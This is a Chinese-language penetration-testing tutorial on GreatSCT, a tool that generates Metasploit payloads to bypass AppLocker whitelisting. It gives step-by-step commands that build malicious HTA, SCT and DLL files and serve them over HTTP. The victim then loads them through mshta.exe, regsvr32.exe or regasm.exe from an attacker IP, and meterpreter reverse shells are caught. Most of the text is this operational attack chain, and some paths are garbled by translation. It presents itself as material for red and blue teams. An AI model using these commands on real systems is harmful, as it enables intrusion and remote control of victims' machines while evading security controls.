在编写Applocker旁路系列时,我们发现了一个专门用于绕过白名单应用程序的新工具。因此,我决定写这篇文章,在此我们将介绍另一个最有趣的工具“ Great SCT – Metasploit有效负载生成器”工具,该工具与Unicorn或msfvenom类似,因为它依赖于Metasploit框架来提供受害者计算机的反向连接。因此,让我们从其教程开始并检查其功能。
表中的内容
- GreatSCT
- 安装与用法
- 生成恶意的hta文件
- 生成恶意的sct文件
- 生成恶意的dll文件
GreatSCT
GreatSCT当前在@ConsciousHacker的支持下,该项目称为Great SCT(伟大的Scott)。Great SCT是一个开源项目,用于生成应用程序白名单绕过。此工具适用于红色和蓝色团队。它是一种工具,用于生成绕过常见的防病毒解决方案和应用程序白名单解决方案的Metasploit有效负载。
您可以从这里下载:https://github.com/GreatSCT/GreatSCT
安装与用法
必须先下载并安装它才能开始使用Great SCT。运行以下命令从github下载Great SCT,并在安装它时注意其依赖项工具。
通过使用以下工具,这有助于绕过Applocker策略:
- Installutil.exe: 安装程序工具是命令行工具,可让您通过运行安装程序组件来安装和卸载特定程序集中的服务器资源。
- Msbuild.exe: Microsoft Build Engine是用于构建应用程序的平台。此引擎,也称为MSBuild。
- Mshta.exe: Mshta.exe运行Microsoft HTML应用程序主机,这是Windows OS实用程序,负责运行HTA(HTML应用程序)文件。我们可以运行JavaScript或Visual的HTML文件。
- Regasm.exe:程序集注册工具读取程序集内的元数据,并将必要的条目添加到注册表中,从而使COM客户端可以透明地创建.NET Framework类。
- Regsvcs.exe: RegSvcs代表Microsoft .NET远程注册表服务,因.NET Services安装而闻名。
- Regsvr32.exe: Regsvr32是一个命令行实用程序,用于在Windows注册表中注册和注销OLE控件,例如DLL和ActiveX控件。
git clone //github.com/GreatSCT/GreatSCT.git
cd GreatSCT
cd setup
./setup.sh
下载完成后,键入以下命令以访问帮助命令:
use Bypass
现在要获取有效载荷列表:
list
生成恶意的hta文件
现在,从有效负载列表中,您可以选择任何人进行所需的攻击。但是对于这种攻击,我们将使用:
use mshta/shellcode_inject/base64_migrate.py
执行命令后,键入:
generate
执行generate命令后,它会询问您要使用哪种方法。因为我们将使用msfvenom类型1选择第一个选项。然后单击Enter作为抄表器。然后提供lhost和lport,分别为192.168.1.107、4321。
生成shellcode时,它将要求您提供有效负载的名称。默认情况下,它将以“有效载荷”作为名称。因为我不想给任何名字,所以我只按Enter键。
现在,它制作了两个文件。一个资源文件,另一个hta文件。
现在,首先,通过输入以下命令在/ usr / share / greatsct-output / source中启动python的服务器:
python -m SimpleHTTPServer 80
现在,在受害计算机的命令提示符下执行hta文件。
mshta.exe //192.168.1.107/payload.hta
同时,使用资源文件启动多重/处理程序。为此,键入:
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
瞧!你有会议。
访问此处“使用mshta.exe(多种方法)绕过应用程序白名单”,以了解有关mshta.exe技术的更多信息。
生成恶意的sct文件
现在,从有效负载列表中,您可以选择任何人进行所需的攻击。但是对于这种攻击,我们将使用:
use regsvr32/shellcode_inject/base64_migrate.py
执行命令后,键入:
generate
然后它将要求您提供有效载荷。只需按Enter键,因为它将 Windows / meterpreter / reverse_tcp 作为默认有效载荷,而这正是我们需要的有效载荷。在提供了像这样的IP之后,我们给了192.168.1.107和给定的端口(任意),如下图所示,我们给lport提供了2345
提供详细信息后,它将询问您的恶意软件名称。默认情况下,它将设置名称“ payload”,以便您可以输入名称或仅按Enter键即可使用默认设置。
就像按Enter一样,它将生成两个文件。其中一个将是资源文件,其他将是.sct文件。现在,通过输入以下内容在/ usr / share / greatsct-output / source中启动python的服务器:
python -m SimpleHTTPServer 80
现在,在受害者的PC的运行窗口中执行.sct文件,如下所示
1
regsvr32.exe /s /u /n /i://192.168.1.107/payload.sct
同时,使用资源文件启动多重/处理程序。为此,键入:
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
瞧!你有会议。
访问此处“使用regsrv32.exe绕过应用程序白名单(多种方法) ”,以了解有关mshta.exe技术的更多信息。
生成恶意的dll文件
现在,从有效负载列表中,您可以选择任何人进行所需的攻击。但是对于这种攻击,我们将使用:
use regasm/meterpreter/rev_tcp.py
执行命令后,键入:
set lhost 192.168.1.107
generate
提供详细信息后,它将询问您恶意软件的名称。默认情况下,它将设置名称“ payload”,以便您可以输入名称或仅按Enter键即可使用默认设置。
就像按Enter一样,它会生成dll文件。
现在,通过输入以下内容在/ usr / share / greatsct-output / compiled中启动python的服务器:
python -m SimpleHTTPServer 80
现在将上面生成的dll文件放置在以下位置:C: Windows Microsoft.NET Framework v4.0.30319 v4.0.30319 ,然后在受害者PC的运行窗口中执行.dll文件,如下所示:
C:WindowsMicrosoft.NETFrameworkv4.0.30319 egasm.exe /U payload.dll
同时,使用资源文件启动多重/处理程序。为此,键入:
msfconsole -r /usr/share/greatsct-output/handlers/payload.rc
瞧!你有会议。
